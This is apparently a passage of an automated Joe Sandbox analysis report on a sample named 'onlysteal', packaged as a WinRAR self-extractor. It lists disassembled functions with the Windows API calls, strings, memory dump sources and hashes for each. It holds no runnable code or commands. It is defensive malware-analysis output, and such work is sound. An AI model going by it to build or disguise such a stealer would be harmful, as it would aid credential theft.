                                      • Opcode ID: dea69f01f0c6fe86a9daee7a493eb3857fc74a2084145dc5d9a6ed9277f31f49
                                      • Instruction ID: 65f23a3faa9a86f3d1572c7b5ade6ccae25b35b7d7c16aa8a165951e0fcbcd98
                                      • Opcode Fuzzy Hash: dea69f01f0c6fe86a9daee7a493eb3857fc74a2084145dc5d9a6ed9277f31f49
                                      • Instruction Fuzzy Hash: 2201887BE24255EFDB159F58FC4CA577BA8F709754B100426F809D3230C6B198B0DBA0
                                      Function 00231316 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0023E2E8: _swprintf.LIBCMT ref: 0023E30E
                                        • Part of subcall function 0023E2E8: _strlen.LIBCMT ref: 0023E32F
                                        • Part of subcall function 0023E2E8: SetDlgItemTextW.USER32(?,0026E274,?), ref: 0023E38F
                                        • Part of subcall function 0023E2E8: GetWindowRect.USER32(?,?), ref: 0023E3C9
                                        • Part of subcall function 0023E2E8: GetClientRect.USER32(?,?), ref: 0023E3D5
                                      • GetDlgItem.USER32(00000000,00003021), ref: 0023135A
                                      • SetWindowTextW.USER32(00000000,002635F4), ref: 00231370
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ItemRectTextWindow$Client_strlen_swprintf
                                      • String ID: $$0
                                      • API String ID: 2622349952-1274290131
                                      • Opcode ID: f4e945887a683f0f9dd0d7b42a7520ab2c53efecfde762b13da7516e9a620a2a
                                      • Instruction ID: b4f0b119a99ef1b13e2c5d246b1444765746d55e40b0ec3749eb9cd65690641e
                                      • Opcode Fuzzy Hash: f4e945887a683f0f9dd0d7b42a7520ab2c53efecfde762b13da7516e9a620a2a
                                      • Instruction Fuzzy Hash: FFF062B012438DAADF155F64DC0DBEA3B59AF44344F048199FC49555A1CB74C9B8EB50
                                      Function 00259A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: __alldvrm$_strrchr
                                      • String ID:
                                      • API String ID: 1036877536-0
                                      • Opcode ID: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                      • Instruction ID: 48ec2ddf6c14c03748f9ddec6b9fae1dce0195b10ab6dc23ecfb5b62736a7614
                                      • Opcode Fuzzy Hash: bd80df88fd36397a74f1d09f46f498bd400f42511a2e95d334d89abd8e93371a
                                      • Instruction Fuzzy Hash: FFA15B71920386DFEB15CF18C8917AEBBE5EF55312F14416EEC859B281C2388DE9CB58
                                      Function 0023A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00237F69,?,?,?), ref: 0023A3FA
                                      • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00237F69,?), ref: 0023A43E
                                      • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00237F69,?,?,?,?,?,?,?), ref: 0023A4BF
                                      • CloseHandle.KERNEL32(?,?,?,00000800,?,00237F69,?,?,?,?,?,?,?,?,?,?), ref: 0023A4C6
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$Create$CloseHandleTime
                                      • String ID:
                                      • API String ID: 2287278272-0
                                      • Opcode ID: 41410a50cb5fb068db1dd9fbf26c5110b0d744e1ec226311d94ad46c1c862d63
                                      • Instruction ID: 798b2e202e025fc7c3b6ce5dfc41325e442cccd694e6054f83f3471e662ac585
                                      • Opcode Fuzzy Hash: 41410a50cb5fb068db1dd9fbf26c5110b0d744e1ec226311d94ad46c1c862d63
                                      • Instruction Fuzzy Hash: 4F41E1B1258382AAD731DF24DC49FAFBBE8AF81700F04096DF6D093180D6A49A5CDB53
                                      Function 0025C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                      Download Yara Rule
                                      APIs
                                      • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,002591E0,?,00000000,?,00000001,?,?,00000001,002591E0,?), ref: 0025C9D5
                                      • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0025CA5E
                                      • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00256CBE,?), ref: 0025CA70
                                      • __freea.LIBCMT ref: 0025CA79
                                        • Part of subcall function 00258E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0025CA2C,00000000,?,00256CBE,?,00000008,?,002591E0,?,?,?), ref: 00258E38
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                      • String ID:
                                      • API String ID: 2652629310-0
                                      • Opcode ID: b0f4a005f4e19b9efbd9ff0e2121e8e45be5c41f76466c4df2aa8ad859efa25c
                                      • Instruction ID: 72f8ddf6fd49e020b24301006e65c1a6934f94eb15e81f842282fc23a7afd061
                                      • Opcode Fuzzy Hash: b0f4a005f4e19b9efbd9ff0e2121e8e45be5c41f76466c4df2aa8ad859efa25c
                                      • Instruction Fuzzy Hash: 5A31E132A2020AAFDF25DF64DC55DBE7BA5EB41311B244268FC04E7250E735DD68CB90
                                      Function 0024A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetDC.USER32(00000000), ref: 0024A666
                                      • GetDeviceCaps.GDI32(00000000,00000058), ref: 0024A675
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0024A683
                                      • ReleaseDC.USER32(00000000,00000000), ref: 0024A691
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: CapsDevice$Release
                                      • String ID:
                                      • API String ID: 1035833867-0
                                      • Opcode ID: e662708a34f0c1231928df5872e34771ac5f740b1e5786bc5f813fae83d95a2c
                                      • Instruction ID: cb685c3be64cbf163a2c03e3919a30420c07906e605e4017a38f6d96b090e392
                                      • Opcode Fuzzy Hash: e662708a34f0c1231928df5872e34771ac5f740b1e5786bc5f813fae83d95a2c
                                      • Instruction Fuzzy Hash: E2E01231992722B7D7619B60BC1EB8B3E58AB05B62F010112FA09E61D0EBB486408BA1
                                      Function 0024D06A Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 278COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: .lnk$d$
                                      • API String ID: 2691759472-2573257209
                                      • Opcode ID: 2c813f4040ab0f3a7ea56c8b31b3f8b6f9aa30e25b895d39ce9e448c9198483c
                                      • Instruction ID: 11818f74aa3cabdca9efc603259bde822a244fcc1c0abd79ea016bf408e81bce
                                      • Opcode Fuzzy Hash: 2c813f4040ab0f3a7ea56c8b31b3f8b6f9aa30e25b895d39ce9e448c9198483c
                                      • Instruction Fuzzy Hash: E6A1537292012A96DF29DFA0CD45EFA73FCAF44304F0885A6F909E7141EE749B948F60
                                      Function 0025B1B8 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 168COMMON
                                      Download Yara Rule
                                      APIs
                                      • _free.LIBCMT ref: 0025B324
                                        • Part of subcall function 00259097: IsProcessorFeaturePresent.KERNEL32(00000017,00259086,00000050,00263A34,?,0023D710,00000004,00271030,?,?,00259093,00000000,00000000,00000000,00000000,00000000), ref: 00259099
                                        • Part of subcall function 00259097: GetCurrentProcess.KERNEL32(C0000417,00263A34,00000050,00271030), ref: 002590BB
                                        • Part of subcall function 00259097: TerminateProcess.KERNEL32(00000000), ref: 002590C2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                      • String ID: *?$.
                                      • API String ID: 2667617558-3972193922
                                      • Opcode ID: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                      • Instruction ID: 557b5a0ed5b0b62e92759ffff65da01df99cad471fdc48051cdeefcb181dfaf2
                                      • Opcode Fuzzy Hash: 24177f1303fc0c2b907af2c7b7eb43e02322faf7c38b9a999d5b9cde15d1856f
                                      • Instruction Fuzzy Hash: 7451A071E1010AEFDF15CFA8C881AADBBB5EF58311F2481A9EC44E7340E7719A158B54
                                      Function 002375DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • __EH_prolog.LIBCMT ref: 002375E3
                                        • Part of subcall function 002405DA: _wcslen.LIBCMT ref: 002405E0
                                        • Part of subcall function 0023A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0023A598
                                      • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0023777F
                                        • Part of subcall function 0023A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A501
                                        • Part of subcall function 0023A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0023A325,?,?,?,0023A175,?,00000001,00000000,?,?), ref: 0023A532
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                      • String ID: :
                                      • API String ID: 3226429890-336475711
                                      • Opcode ID: c7aa4124e5cc68cdc4512203ef8d050453e045c9bbe923fb50a5e31412e03e62
                                      • Instruction ID: e571079132a59fb98c33210e3bcca0e206fa6c20e59f559b2e506c880d56d1c3
                                      • Opcode Fuzzy Hash: c7aa4124e5cc68cdc4512203ef8d050453e045c9bbe923fb50a5e31412e03e62
                                      • Instruction Fuzzy Hash: F74163F1821158A9EF35EB64CC56EEEB37CAF51300F404096B645A2092DB745FE9CF60
                                      Function 0023B37A Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 127COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: *
                                      • API String ID: 2691759472-163128923
                                      • Opcode ID: fbd58c0a7383e20a9ddfb7f9914aae672d2581e7e648a1ce025d77983f4fcb48
                                      • Instruction ID: 32d7be97f4803bb4d455a04547dcdbe23f2404050be4d73c6ad3df85b99580a1
                                      • Opcode Fuzzy Hash: fbd58c0a7383e20a9ddfb7f9914aae672d2581e7e648a1ce025d77983f4fcb48
                                      • Instruction Fuzzy Hash: EE3188F6534313AACB32EE00982267B73E4DF95B10F14801EFF8853043E7628DA1932A
                                      Function 0024B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: }
                                      • API String ID: 176396367-4239843852
                                      • Opcode ID: e7264f2c6b1843af72f7ccfedf4607f9428a108d640250c4b96e58721166b15b
                                      • Instruction ID: 817c62beebb99065bb62b6c29269d5e70017761060d598882190d44abd1ec4d6
                                      • Opcode Fuzzy Hash: e7264f2c6b1843af72f7ccfedf4607f9428a108d640250c4b96e58721166b15b
                                      • Instruction Fuzzy Hash: D72101729243065AD73AEF64D845A6AB3ECDF90750F40042AF940C3141EBB4DD6887A2
                                      Function 0023F344 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0023F2C5: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0023F2E4
                                        • Part of subcall function 0023F2C5: GetProcAddress.KERNEL32(002781C8,CryptUnprotectMemory), ref: 0023F2F4
                                      • GetCurrentProcessId.KERNEL32(?,?,?,0023F33E), ref: 0023F3D2
                                      Strings
                                      • CryptUnprotectMemory failed, xrefs: 0023F3CA
                                      • CryptProtectMemory failed, xrefs: 0023F389
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: AddressProc$CurrentProcess
                                      • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                                      • API String ID: 2190909847-396321323
                                      • Opcode ID: 11fddbbe0e43cad211815a4a63d2c0594357d15457f3dda3401abbb8895763cc
                                      • Instruction ID: e098c20afbff591a978e86bc823cf1adc9ca2760b6af43ddb84439145a378764
                                      • Opcode Fuzzy Hash: 11fddbbe0e43cad211815a4a63d2c0594357d15457f3dda3401abbb8895763cc
                                      • Instruction Fuzzy Hash: 6F1159B1E2036AABDF519F20FE49A6E3718FF00710F0480A6FC055B251DA749D618A90
                                      Function 0024101F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateThread.KERNEL32(00000000,00010000,00241160,?,00000000,00000000), ref: 00241043
                                      • SetThreadPriority.KERNEL32(?,00000000), ref: 0024108A
                                        • Part of subcall function 00236C36: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00236C54
                                        • Part of subcall function 00236DCB: _wcschr.LIBVCRUNTIME ref: 00236E0A
                                        • Part of subcall function 00236DCB: _wcschr.LIBVCRUNTIME ref: 00236E19
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: Thread_wcschr$CreatePriority__vswprintf_c_l
                                      • String ID: CreateThread failed
                                      • API String ID: 2706921342-3849766595
                                      • Opcode ID: e83ef5c5bd52d30d3453e0e5a860cb9780608d28d24eac3a7e7713299a75b3b9
                                      • Instruction ID: 50aecfca68e1854d50ea4c31ed6ec7f303992911acce9af4605a04421f113bcc
                                      • Opcode Fuzzy Hash: e83ef5c5bd52d30d3453e0e5a860cb9780608d28d24eac3a7e7713299a75b3b9
                                      • Instruction Fuzzy Hash: C5012BF53603097BD3346F24AC4AB76735CEB50751F20402EF98A52184CAF0A8F44624
                                      Function 0023C058 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcschr
                                      • String ID: <9&$?*<>|"
                                      • API String ID: 2691759472-2877517911
                                      • Opcode ID: c63baac53a9521de53124275fb4d228602b720f9eddd60f33c58d2d9f0560038
                                      • Instruction ID: c776526e99691657634b074d0ed9e29cb5fc819a8137ffc1e07726be0915a9ab
                                      • Opcode Fuzzy Hash: c63baac53a9521de53124275fb4d228602b720f9eddd60f33c58d2d9f0560038
                                      • Instruction Fuzzy Hash: F2F0D197A75382C1C7386E289801732B3E8EFA1320F34081EE4C4A72D2E6A188E08765
                                      Function 0024DB4B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen
                                      • String ID: Software\WinRAR SFX$$
                                      • API String ID: 176396367-2260685054
                                      • Opcode ID: 1e1a7f1b3f69c578b077a175b4acfc960e88e6444506effb03ced23f4168697e
                                      • Instruction ID: 745238a7866ef3a6915c2507416a55a8e9748ff4881d4cbe6812a0493e930e07
                                      • Opcode Fuzzy Hash: 1e1a7f1b3f69c578b077a175b4acfc960e88e6444506effb03ced23f4168697e
                                      • Instruction Fuzzy Hash: EE018B31910129BAEB21DB91EC0EFDF7F7CFF457A4F004052B509A10A0D7B18AA8CBA1
                                      Function 0024AE2F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0023C29A: _wcslen.LIBCMT ref: 0023C2A2
                                        • Part of subcall function 00241FDD: _wcslen.LIBCMT ref: 00241FE5
                                        • Part of subcall function 00241FDD: _wcslen.LIBCMT ref: 00241FF6
                                        • Part of subcall function 00241FDD: _wcslen.LIBCMT ref: 00242006
                                        • Part of subcall function 00241FDD: _wcslen.LIBCMT ref: 00242014
                                        • Part of subcall function 00241FDD: CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0023B371,?,?,00000000,?,?,?), ref: 0024202F
                                        • Part of subcall function 0024AC04: SetCurrentDirectoryW.KERNELBASE(?,0024AE72,C:\Users\user\Desktop,00000000,0027946A,00000006), ref: 0024AC08
                                      • _wcslen.LIBCMT ref: 0024AE8B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2092415789.0000000000231000.00000020.00000001.01000000.00000003.sdmp, Offset: 00230000, based on PE: true
                                      • Associated: 00000000.00000002.2092402941.0000000000230000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092437011.0000000000263000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.000000000026E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000275000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092450648.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2092498429.0000000000293000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_230000_onlysteal.jbxd
                                      Similarity
                                      • API ID: _wcslen$CompareCurrentDirectoryString
                                      • String ID: <$$C:\Users\user\Desktop
                                      • API String ID: 521417927-3202247355
                                      • Opcode ID: b0e7c505ee4fcd3df1dbfc0afecd54db411cb1af52f4d176b4a1816969db5030
